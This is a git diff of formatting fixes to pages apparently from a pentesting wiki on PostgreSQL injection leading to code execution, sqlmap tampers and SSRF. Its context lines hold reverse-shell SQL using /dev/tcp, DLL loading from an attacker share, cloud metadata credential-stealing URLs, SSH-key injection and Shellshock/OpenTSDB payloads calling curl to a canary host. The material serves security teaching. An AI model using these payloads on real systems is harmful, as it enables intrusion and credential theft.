-By default,** creating functions is a privilege granted to PUBLIC**, where PUBLIC refers to every user on that database system. To prevent this, the administrator could have had to revoke the USAGE privilege from the PUBLIC domain:
+By default, **creating functions is a privilege granted to PUBLIC**, where PUBLIC refers to every user on that database system. To prevent this, the administrator could have had to revoke the USAGE privilege from the PUBLIC domain:
 
 ```sql
 REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;
@@ -106,4 +106,4 @@ $$ LANGUAGE 'plpgsql'
 select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
 ```
 
-**Find**[** more information about this attack in this paper**](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt)**.**
+**Find**[ **more information about this attack in this paper**](http://www.leidecker.info/pgshell/Having\_Fun\_With\_PostgreSQL.txt)**.**
diff --git a/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md b/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
index 1937e6d1..376ecc13 100644
--- a/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
+++ b/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
@@ -6,11 +6,11 @@ PostgreSQL is designed to be easily extensible. For this reason, extensions load
 Extensions are modules that supply extra functions, operators, or types. They are libraries written in C.\
 From PostgreSQL > 8.1 the extension libraries must be compiled with a especial header or PostgreSQL will refuse to execute them.
 
-Also, keep in mind that** if you don't know how to **[**upload files to the victim abusing PostgreSQL you should read this post.**](big-binary-files-upload-postgresql.md)****
+Also, keep in mind that **if you don't know how to** [**upload files to the victim abusing PostgreSQL you should read this post.**](big-binary-files-upload-postgresql.md)****
 
 ### RCE in Linux
 
-The process for executing system commands from PostgreSQL 8.1 and before is straightforward and well documented ([Metasploit module](https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload)):
+The process for executing system commands from PostgreSQL 8.1 and before is straightforward and well documented ([Metasploit module](https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres\_payload)):
 
 ```c
 CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
@@ -77,7 +77,7 @@ SELECT sys('bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"');
 #Notice the double single quotes are needed to scape the qoutes
 ```
 
-You can find this** library precompiled** to several different PostgreSQL versions and even can **automate this process** (if you have PostgreSQL access) with:
+You can find this **library precompiled** to several different PostgreSQL versions and even can **automate this process** (if you have PostgreSQL access) with:
 
 {% embed url="https://github.com/Dionach/pgexec" %}
 
@@ -85,7 +85,7 @@ For more information read: [https://www.dionach.com/blog/postgresql-9-x-remote-c
 
 ### RCE in Windows
 
-The following DLL takes as input the **name of the binary** and the **number **of **times **you want to execute it and executes it:
+The following DLL takes as input the **name of the binary** and the **number** of **times** you want to execute it and executes it:
 
 ```c
 #include "postgres.h"
@@ -216,7 +216,7 @@ Datum dummy_function(PG_FUNCTION_ARGS)
 }
 ```
 
-Note how in this case the** malicious code is inside the DllMain function**. This means that in this case it isn't necessary to execute the loaded function in postgresql, just **loading the DLL** will **execute **the reverse shell:
+Note how in this case the **malicious code is inside the DllMain function**. This means that in this case it isn't necessary to execute the loaded function in postgresql, just **loading the DLL** will **execute** the reverse shell:
 
 ```c
 CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\shared\dummy_function.dll', 'dummy_function' LANGUAGE C STRICT;
@@ -224,15 +224,15 @@ CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\sha
 
 ### RCE in newest Prostgres versions
 
-On the **latest versions **of PostgreSQL, the `superuser` is **no **longer **allowed **to **load **a shared library file from **anywhere **else besides `C:\Program Files\PostgreSQL\11\lib` on Windows or `/var/lib/postgresql/11/lib` on \*nix. Additionally, this path is **not writable** by either the NETWORK_SERVICE or postgres accounts.
+On the **latest versions** of PostgreSQL, the `superuser` is **no** longer **allowed** to **load** a shared library file from **anywhere** else besides `C:\Program Files\PostgreSQL\11\lib` on Windows or `/var/lib/postgresql/11/lib` on \*nix. Additionally, this path is **not writable** by either the NETWORK\_SERVICE or postgres accounts.
 
-However, an authenticated database `superuser` **can write **binary files to the file-system using “large objects” and can of course write to the `C:\Program Files\PostgreSQL\11\data` directory. The reason for this should be clear, for updating/creating tables in the database.
+However, an authenticated database `superuser` **can write** binary files to the file-system using “large objects” and can of course write to the `C:\Program Files\PostgreSQL\11\data` directory. The reason for this should be clear, for updating/creating tables in the database.
 
-The underlying issue is that the `CREATE FUNCTION` operative** allows for a directory traversal **to the data directory! So essentially, an authenticated attacker can **write a shared library file into the data directory and use the traversal to load the shared library**. This means an attacker can get native code execution and as such, execute arbitrary code.
+The underlying issue is that the `CREATE FUNCTION` operative **allows for a directory traversal** to the data directory! So essentially, an authenticated attacker can **write a shared library file into the data directory and use the traversal to load the shared library**. This means an attacker can get native code execution and as such, execute arbitrary code.
 
 #### Attack flow
 
-First of all you need to** use large objects to upload the dll**. You can see how to do that here:
+First of all you need to **use large objects to upload the dll**. You can see how to do that here:
 
 {% content-ref url="big-binary-files-upload-postgresql.md" %}
 [big-binary-files-upload-postgresql.md](big-binary-files-upload-postgresql.md)
@@ -247,8 +247,8 @@ select connect_back('192.168.100.54', 1234);
 
 _Note that you don't need to append the `.dll` extension as the create function will add it._
 
-For more information **read the**[** original publication here**](https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**.**\
-In that publication **this was the **[**code use to generate the postgres extension**](https://github.com/sourceincite/tools/blob/master/pgpwn.c)** **(_to learn how to compile a postgres extension read any of the previous versions_).\
+For more information **read the**[ **original publication here**](https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**.**\
+In that publication **this was the** [**code use to generate the postgres extension**](https://github.com/sourceincite/tools/blob/master/pgpwn.c) **** (_to learn how to compile a postgres extension read any of the previous versions_).\
 In the same page this **exploit to automate** this technique was given:
 
 ```python
diff --git a/pentesting-web/sql-injection/sqlmap/README.md b/pentesting-web/sql-injection/sqlmap/README.md
index aceee752..ab72b2a5 100644
--- a/pentesting-web/sql-injection/sqlmap/README.md
+++ b/pentesting-web/sql-injection/sqlmap/README.md
@@ -135,7 +135,7 @@ python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wis
 sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
 ```
 
-****[**Read this post **](second-order-injection-sqlmap.md)**about how to perform simple and complex second order injections with sqlmap.**
+****[**Read this post** ](second-order-injection-sqlmap.md)**about how to perform simple and complex second order injections with sqlmap.**
 
 ## Customizing Injection
 
@@ -178,7 +178,7 @@ Remember that **you can create your own tamper in python** and it's very simple.
 | chardoubleencode.py          | Double url-encodes all characters in a given payload (not processing already encoded)                                              |
 | commalesslimit.py            | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'                                                                       |
 | commalessmid.py              | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'                                                                  |
-| concat2concatws.py           | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'                                                  |
+| concat2concatws.py           | Replaces instances like 'CONCAT(A, B)' with 'CONCAT\_WS(MID(CHAR(0), 0, 0), A, B)'                                                 |
 | charencode.py                | Url-encodes all characters in a given payload (not processing already encoded)                                                     |
 | charunicodeencode.py         | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "%u0022"                           |
 | charunicodeescape.py         | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "\u0022"                           |
@@ -196,7 +196,7 @@ Remember that **you can create your own tamper in python** and it's very simple.
 | randomcase.py                | Replaces each keyword character with random case value                                                                             |
 | randomcomments.py            | Add random comments to SQL keywords                                                                                                |
 | securesphere.py              | Appends special crafted string                                                                                                     |
-| sp_password.py               | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs                                           |
+| sp\_password.py              | Appends 'sp\_password' to the end of the payload for automatic obfuscation from DBMS logs                                          |
 | space2comment.py             | Replaces space character (' ') with comments                                                                                       |
 | space2dash.py                | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')                        |
 | space2hash.py                | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')                      |
diff --git a/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md b/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
index bd30ffb4..0436cab9 100644
--- a/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
+++ b/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
@@ -3,8 +3,8 @@
 **SQLMap can exploit Second Order SQLis.**\
 ****You need to provide:
 
-* The **request **where the **sqlinjection payload **is going to be saved
-* The **request **where the **payload **will be **executed**
+* The **request** where the **sqlinjection payload** is going to be saved
+* The **request** where the **payload** will be **executed**
 
 The request where the SQL injection payload is saved is **indicated as in any other injection in sqlmap**. The request **where sqlmap can read the output/execution** of the injection can be indicated with `--second-url` or with `--second-req` if you need to indicate a complete request from a file.
 
diff --git a/pentesting-web/ssrf-server-side-request-forgery.md b/pentesting-web/ssrf-server-side-request-forgery.md
index 705655b8..a7e89e4c 100644
--- a/pentesting-web/ssrf-server-side-request-forgery.md
+++ b/pentesting-web/ssrf-server-side-request-forgery.md
@@ -11,12 +11,12 @@ Server-side request forgery (also known as SSRF) is a web security vulnerability
   * Local **IP bypass**
   * **DNS spoofing** (domains pointing to 127.0.0.1)
   * **DNS Rebinding** (resolves to an IP and next time to a local IP: [http://rbnd.gl0.eu/dnsbin](http://rbnd.gl0.eu/dnsbin)). This is useful to bypass configurations which resolves the given domain and check it against a white-list and then try to access it again (as it has to resolve the domain again a different IP can be served by the DNS). More [info here](https://geleta.eu/2019/my-first-ssrf-using-dns-rebinfing/).
-* Trying to make an** internal assets discovery and internal port scan**.
+* Trying to make an **internal assets discovery and internal port scan**.
 * Accessing **private content** (filtered by IP or only accessible locally, like _/admin_ path).
 
 ## Internet Exfiltration Services
 
-You could use **burpcollab** or [**pingb**](http://pingb.in)** **for example. 
+You could use **burpcollab** or [**pingb**](http://pingb.in) **** for example.&#x20;
 
 ## Bypass restrictions
 
@@ -210,10 +210,10 @@ ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
 
 ### Gopher://
 
-Using this protocol you can specify the** ip, port and bytes** you want the listener to **send**. Then, you can basically exploit a SSRF to **communicate with any TCP server** (but you need to know how to talk to the service first).\
+Using this protocol you can specify the **ip, port and bytes** you want the listener to **send**. Then, you can basically exploit a SSRF to **communicate with any TCP server** (but you need to know how to talk to the service first).\
 Fortunately, you can use [https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus) to already create payloads for several services.
 
-#### Gopher smtp 
+#### Gopher smtp&#x20;
 
 ```
 ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
@@ -263,7 +263,7 @@ It might be worth trying a payload like: `` url=http://3iufty2q67fuy2dew3yug4f34
 
 ### Exploiting PDFs Rendering
 
-If the web page is automatically creating a PDF with some information you have provided, you can **insert some JS that will be executed by the PDF creator **itself (the server) while creating the PDF and you will be able to abuse a SSRF. [**Find more information here.**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)****
+If the web page is automatically creating a PDF with some information you have provided, you can **insert some JS that will be executed by the PDF creator** itself (the server) while creating the PDF and you will be able to abuse a SSRF. [**Find more information here.**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)****
 
 ### From SSRF to DoS
 
@@ -279,16 +279,16 @@ Requirements:
 
 Attack:
 
-1. Ask the user/bot **access **a **domain **controlled by the **attacker**
-2. The **TTL **of the **DNS **is **0 **sec (so the victim will check the IP of the domain again soon)
-3. A **TLS connection **is created between the victim and the domain of the attacker. The attacker introduces the **payload inside **the **Session ID or Session Ticket**.
-4. The **domain **will start an **infinite loop **of redirects against **himself**. The goal of this is to make the user/bot access the domain until it perform **again **a **DNS request **of the domain.
-5. In the DNS request a **private IP** address is given **now **(127.0.0.1 for example)
-6. The user/bot will try to **reestablish the TLS connection** and in order to do so it will **send **the **Session **ID/Ticket ID (where the **payload **of the attacker was contained). So congratulations you managed to ask the **user/bot attack himself**.
+1. Ask the user/bot **access** a **domain** controlled by the **attacker**
+2. The **TTL** of the **DNS** is **0** sec (so the victim will check the IP of the domain again soon)
+3. A **TLS connection** is created between the victim and the domain of the attacker. The attacker introduces the **payload inside** the **Session ID or Session Ticket**.
+4. The **domain** will start an **infinite loop** of redirects against **himself**. The goal of this is to make the user/bot access the domain until it perform **again** a **DNS request** of the domain.
+5. In the DNS request a **private IP** address is given **now** (127.0.0.1 for example)
+6. The user/bot will try to **reestablish the TLS connection** and in order to do so it will **send** the **Session** ID/Ticket ID (where the **payload** of the attacker was contained). So congratulations you managed to ask the **user/bot attack himself**.
 
-Note that during this attack, if you want to attack localhost:11211 (_memcache_) you need to make the victim establish the initial connection with www.attacker.com:11211 (the** port must always be the same**).\
+Note that during this attack, if you want to attack localhost:11211 (_memcache_) you need to make the victim establish the initial connection with www.attacker.com:11211 (the **port must always be the same**).\
 To **perform this attack you can use the tool**: [https://github.com/jmdx/TLS-poison/](https://github.com/jmdx/TLS-poison/)\
-For **more information** take a look to the talk where this attack is explained: [https://www.youtube.com/watch?v=qGpAJxfADjo\&ab_channel=DEFCONConference](https://www.youtube.com/watch?v=qGpAJxfADjo\&ab_channel=DEFCONConference)
+For **more information** take a look to the talk where this attack is explained: [https://www.youtube.com/watch?v=qGpAJxfADjo\&ab\_channel=DEFCONConference](https://www.youtube.com/watch?v=qGpAJxfADjo\&ab\_channel=DEFCONConference)
 
 ## Exploitation in Cloud
 
@@ -296,7 +296,7 @@ For **more information** take a look to the talk where this attack is explained:
 
 #### 169.254.169.254 - Metadata Address
 
-**Metadata **of the  basic virtual machines from AWS (called EC2) can be retrieved from the VM accessing the url: `http://169.254.169.254` ([information about the metadata here](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)).
+**Metadata** of the  basic virtual machines from AWS (called EC2) can be retrieved from the VM accessing the url: `http://169.254.169.254` ([information about the metadata here](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)).
 
 The IP address 169.254.169.254 is a magic IP in the cloud world. AWS, Azure, Google, DigitalOcean and others use this to allow cloud resources to find out metadata about themselves. Some, such as Google, have additional constraints on the requests, such as requiring it to use `Metadata-Flavor: Google` as an HTTP header and refusing requests with an `X-Forwarded-For` header. **AWS has no constraints**.
 
@@ -330,7 +330,7 @@ The response should look something like this:
 }
 ```
 
-You can then take** those credentials and use them with the AWS CLI**. This will allow you to do** anything that role has permissions** to do. If the role has improper permissions set (Most likely) you will be able to do all kinds of things, you might even be able to take over their entire cloud network.
+You can then take **those credentials and use them with the AWS CLI**. This will allow you to do **anything that role has permissions** to do. If the role has improper permissions set (Most likely) you will be able to do all kinds of things, you might even be able to take over their entire cloud network.
 
 To take advantage of the new credentials, you will need to crate a new AWS profile like this one:
 
@@ -341,21 +341,21 @@ aws_secret_access_key = a5kssI2I4H/atUZOwBr5Vpggd9CxiT5pUkyPJsjC
 aws_session_token = AgoJb3JpZ2luX2VjEGcaCXVzLXdlc3QtMiJHMEUCIHgCnKJl8fwc+0iaa6n4FsgtWaIikf5mSSoMIWsUGMb1AiEAlOiY0zQ31XapsIjJwgEXhBIW3u/XOfZJTrvdNe4rbFwq2gMIYBAAGgw5NzU0MjYyNjIwMjkiDCvj4qbZSIiiBUtrIiq3A8IfXmTcebRDxJ9BGjNwLbOYDlbQYXBIegzliUez3P/fQxD3qDr+SNFg9w6WkgmDZtjei6YzOc/a9TWgIzCPQAWkn6BlXufS+zm4aVtcgvBKyu4F432AuT4Wuq7zrRc+42m3Z9InIM0BuJtzLkzzbBPfZAz81eSXumPdid6G/4v+o/VxI3OrayZVT2+fB34cKujEOnBwgEd6xUGUcFWb52+jlIbs8RzVIK/xHVoZvYpY6KlmLOakx/mOyz1tb0Z204NZPJ7rj9mHk+cX/G0BnYGIf8ZA2pyBdQyVbb1EzV0U+IPlI+nkIgYCrwTCXUOYbm66lj90frIYG0x2qI7HtaKKbRM5pcGkiYkUAUvA3LpUW6LVn365h0uIbYbVJqSAtjxUN9o0hbQD/W9Y6ZM0WoLSQhYt4jzZiWi00owZJjKHbBaQV6RFwn5mCD+OybS8Y1dn2lqqJgY2U78sONvhfewiohPNouW9IQ7nPln3G/dkucQARa/eM/AC1zxLu5nt7QY8R2x9FzmKYGLh6sBoNO1HXGzSQlDdQE17clcP+hrP/m49MW3nq/A7WHIczuzpn4zv3KICLPIw2uSc7QU6tAEln14bV0oHtHxqC6LBnfhx8yaD9C71j8XbDrfXOEwdOy2hdK0M/AJ3CVe/mtxf96Z6UpqVLPrsLrb1TYTEWCH7yleN0i9koRQDRnjntvRuLmH2ERWLtJFgRU2MWqDNCf2QHWn+j9tYNKQVVwHs3i8paEPyB45MLdFKJg6Ir+Xzl2ojb6qLGirjw8gPufeCM19VbpeLPliYeKsrkrnXWO0o9aImv8cvIzQ8aS1ihqOtkedkAsw=
 ```
 
-Notice the **aws_session_token**, this is indispensable for the profile to work.\
+Notice the **aws\_session\_token**, this is indispensable for the profile to work.\
 Information taken from: [http://ghostlulz.com/ssrf-aws-credentials/](http://ghostlulz.com/ssrf-aws-credentials/) (read that post for further information).\
 Another possible interesting place where you can find credentials is in[ http://169.254.169.254/user-data](http://169.254.169.254/user-data)
 
-[**PACU**](https://github.com/RhinoSecurityLabs/pacu)** **can be used with the discovered credentials to find out your privileges and try to escalate privileges
+[**PACU**](https://github.com/RhinoSecurityLabs/pacu) **** can be used with the discovered credentials to find out your privileges and try to escalate privileges
 
 ### SSRF in AWS ECS (Container Service) credentials
 
 **ECS**, is a logical group of EC2 instances on which you can run an application without having to scale your own cluster management infrastructure because ECS manages that for you. If you manage to compromise service running in **ECS**, the **metadata endpoints change**.
 
-If you access _**http://169.254.170.2/v2/credentials/\<GUID>**_ you will find the credentials of the ECS machine. But first you need to** find the **_**\<GUID>**_ . To find the \<GUID> you need to read the **environ **variable _**AWS_CONTAINER_CREDENTIALS_RELATIVE_URI  **_inside the machine. \
+If you access _**http://169.254.170.2/v2/credentials/\<GUID>**_ you will find the credentials of the ECS machine. But first you need to **find the **_**\<GUID>**_ . To find the \<GUID> you need to read the **environ** variable _**AWS\_CONTAINER\_CREDENTIALS\_RELATIVE\_URI**_  inside the machine. \
 You could be able to read it exploiting an **Path Traversal** to _file:///proc/self/environ_\
 __The mentioned http address should give you the **AccessKey, SecretKey and token**.
 
-### SSRF URL for AWS Elastic Beanstalk <a href="6f97" id="6f97"></a>
+### SSRF URL for AWS Elastic Beanstalk <a href="#6f97" id="6f97"></a>
 
 We retrieve the `accountId` and `region` from the API.
 
@@ -374,7 +374,7 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean
 
 Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
 
-### SSRF URL for Google Cloud <a href="6440" id="6440"></a>
+### SSRF URL for Google Cloud <a href="#6440" id="6440"></a>
 
 Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True”
 
@@ -406,7 +406,7 @@ Interesting files to pull out:
 * Get Access Token : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`](http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token)
 * Kubernetes Key : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json)
 
-### Add an SSH key <a href="3e24" id="3e24"></a>
+### Add an SSH key <a href="#3e24" id="3e24"></a>
 
 Extract the token
 
@@ -435,7 +435,7 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo
 --data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}'
 ```
 
-### SSRF URL for Digital Ocean <a href="9f1f" id="9f1f"></a>
+### SSRF URL for Digital Ocean <a href="#9f1f" id="9f1f"></a>
 
 Documentation available at [`https://developers.digitalocean.com/documentation/metadata/`](https://developers.digitalocean.com/documentation/metadata/)
 
@@ -451,11 +451,11 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re
 curl http://169.254.169.254/metadata/v1.json | jq
 ```
 
-### SSRF URL for Packetcloud <a href="2af0" id="2af0"></a>
+### SSRF URL for Packetcloud <a href="#2af0" id="2af0"></a>
 
 Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata)
 
-### SSRF URL for Azure <a href="cea8" id="cea8"></a>
+### SSRF URL for Azure <a href="#cea8" id="cea8"></a>
 
 Limited, maybe more exists? [`https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`](https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/)
 
@@ -468,7 +468,7 @@ http://169.254.169.254/metadata/instance?api-version=2017-04-02
 http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
 ```
 
-### SSRF URL for OpenStack/RackSpace <a href="2ffc" id="2ffc"></a>
+### SSRF URL for OpenStack/RackSpace <a href="#2ffc" id="2ffc"></a>
 
 (header required? unknown)
 
@@ -476,7 +476,7 @@ http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/pu
 http://169.254.169.254/openstack
 ```
 
-### SSRF URL for HP Helion <a href="a8e0" id="a8e0"></a>
+### SSRF URL for HP Helion <a href="#a8e0" id="a8e0"></a>
 
 (header required? unknown)
 
@@ -484,7 +484,7 @@ http://169.254.169.254/openstack
 http://169.254.169.254/2009-04-04/meta-data/
 ```
 
-### SSRF URL for Oracle Cloud <a href="a723" id="a723"></a>
+### SSRF URL for Oracle Cloud <a href="#a723" id="a723"></a>
 
 ```
 http://192.0.0.192/latest/
@@ -493,7 +493,7 @@ http://192.0.0.192/latest/meta-data/
 http://192.0.0.192/latest/attributes/
 ```
 
-### SSRF URL for Alibaba <a href="51bd" id="51bd"></a>
+### SSRF URL for Alibaba <a href="#51bd" id="51bd"></a>
 
 ```
 http://100.100.100.200/latest/meta-data/
@@ -501,7 +501,7 @@ http://100.100.100.200/latest/meta-data/instance-id
 http://100.100.100.200/latest/meta-data/image-id
 ```
 
-### SSRF URL for Kubernetes ETCD <a href="c80a" id="c80a"></a>
+### SSRF URL for Kubernetes ETCD <a href="#c80a" id="c80a"></a>
 
 Can contain API keys and internal ip and ports
 
@@ -510,7 +510,7 @@ curl -L http://127.0.0.1:2379/version
 curl http://127.0.0.1:2379/v2/keys/?recursive=true
 ```
 
-### SSRF URL for Docker <a href="ac0b" id="ac0b"></a>
+### SSRF URL for Docker <a href="#ac0b" id="ac0b"></a>
 
 ```
 http://127.0.0.1:2375/v1.24/containers/jsonSimple example
@@ -519,7 +519,7 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
 bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
 ```
 
-### SSRF URL for Rancher <a href="8cb7" id="8cb7"></a>
+### SSRF URL for Rancher <a href="#8cb7" id="8cb7"></a>
 
 ```
 curl http://rancher-metadata/<version>/<path>
@@ -531,7 +531,7 @@ The difference between a blind SSRF and a not blind one is that in the blind you
 
 ### Time based SSRF
 
-**Checking the time** of the responses from the server it might be** possible to know if a resource exists or not** (maybe it takes more time accessing an existing resource than accessing one that doesn't exist)
+**Checking the time** of the responses from the server it might be **possible to know if a resource exists or not** (maybe it takes more time accessing an existing resource than accessing one that doesn't exist)
 
 ## Detect SSRF
 
@@ -548,7 +548,7 @@ You can use [https://github.com/teknogeek/ssrf-sheriff](https://github.com/tekno
 
 This section was copied from [https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/)
 
-### Elasticsearch <a href="elasticsearch" id="elasticsearch"></a>
+### Elasticsearch <a href="#elasticsearch" id="elasticsearch"></a>
 
 **Commonly bound port: 9200**
 
@@ -573,7 +573,7 @@ Note: the `_shutdown` API has been removed from Elasticsearch version 2.x. and u
 /_cluster/nodes/_all/_shutdown
 ```
 
-### Weblogic <a href="weblogic" id="weblogic"></a>
+### Weblogic <a href="#weblogic" id="weblogic"></a>
 
 **Commonly bound ports: 80, 443 (SSL), 7001, 8888**
 
@@ -663,13 +663,13 @@ Content-Length: 117
 _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://SSRF_CANARY/poc.xml")
 ```
 
-### Hashicorp Consul <a href="hashicorp-consul" id="hashicorp-consul"></a>
+### Hashicorp Consul <a href="#hashicorp-consul" id="hashicorp-consul"></a>
 
 **Commonly bound ports: 8500, 8501 (SSL)**
 
 Writeup can be found [here](https://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html).
 
-### Shellshock <a href="shellshock" id="shellshock"></a>
+### Shellshock <a href="#shellshock" id="shellshock"></a>
 
 **Commonly bound ports: 80, 443 (SSL), 8080**
 
@@ -685,7 +685,7 @@ Short list of CGI paths to test:
 User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ;  curl SSRF_CANARY
 ```
 
-### Apache Druid <a href="apache-druid" id="apache-druid"></a>
+### Apache Druid <a href="#apache-druid" id="apache-druid"></a>
 
 **Commonly bound ports: 80, 8080, 8888, 8082**
 
@@ -714,7 +714,7 @@ Shutdown supervisors on Apache Druid Overlords:
 /druid/indexer/v1/supervisor/{supervisorId}/shutdown
 ```
 
-### Apache Solr <a href="apache-solr" id="apache-solr"></a>
+### Apache Solr <a href="#apache-solr" id="apache-solr"></a>
 
 **Commonly bound port: 8983**
 
@@ -742,7 +742,7 @@ Taken from [here](https://github.com/veracode-research/solr-injection).
 
 [Research on RCE via dataImportHandler](https://github.com/veracode-research/solr-injection#3-cve-2019-0193-remote-code-execution-via-dataimporthandler)
 
-### PeopleSoft <a href="peoplesoft" id="peoplesoft"></a>
+### PeopleSoft <a href="#peoplesoft" id="peoplesoft"></a>
 
 **Commonly bound ports: 80,443 (SSL)**
 
@@ -797,7 +797,7 @@ Content-Type: application/xml
 <!DOCTYPE a PUBLIC "-//B/A/EN" "http://SSRF_CANARY">
 ```
 
-### Apache Struts <a href="apache-struts" id="apache-struts"></a>
+### Apache Struts <a href="#apache-struts" id="apache-struts"></a>
 
 **Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
 
@@ -813,7 +813,7 @@ Append this to the end of every internal endpoint/URL you know of:
 
 ```
 
-### JBoss <a href="jboss" id="jboss"></a>
+### JBoss <a href="#jboss" id="jboss"></a>
 
 **Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
 
@@ -825,7 +825,7 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
 /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://SSRF_CANARY/utils/cmd.war
 ```
 
-### Confluence <a href="confluence" id="confluence"></a>
+### Confluence <a href="#confluence" id="confluence"></a>
 
 **Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
 
@@ -843,7 +843,7 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
 /plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
 ```
 
-### Jira <a href="jira" id="jira"></a>
+### Jira <a href="#jira" id="jira"></a>
 
 **Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
 
@@ -863,7 +863,7 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
 /plugins/servlet/gadgets/makeRequest?url=https://SSRF_CANARY:443@example.com
 ```
 
-### Other Atlassian Products <a href="other-atlassian-products" id="other-atlassian-products"></a>
+### Other Atlassian Products <a href="#other-atlassian-products" id="other-atlassian-products"></a>
 
 **Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
 
@@ -881,7 +881,7 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
 /plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
 ```
 
-### OpenTSDB <a href="opentsdb" id="opentsdb"></a>
+### OpenTSDB <a href="#opentsdb" id="opentsdb"></a>
 
 **Commonly bound port: 4242**
 
@@ -893,7 +893,7 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
 /q?start=2016/04/13-10:21:00&ignore=2&m=sum:jmxdata.cpu&o=&yrange=[0:]&key=out%20right%20top&wxh=1900x770%60curl%20SSRF_CANARY%60&style=linespoint&png
 ```
 
-### Jenkins <a href="jenkins" id="jenkins"></a>
+### Jenkins <a href="#jenkins" id="jenkins"></a>
 
 **Commonly bound ports: 80,443 (SSL),8080,8888**
 
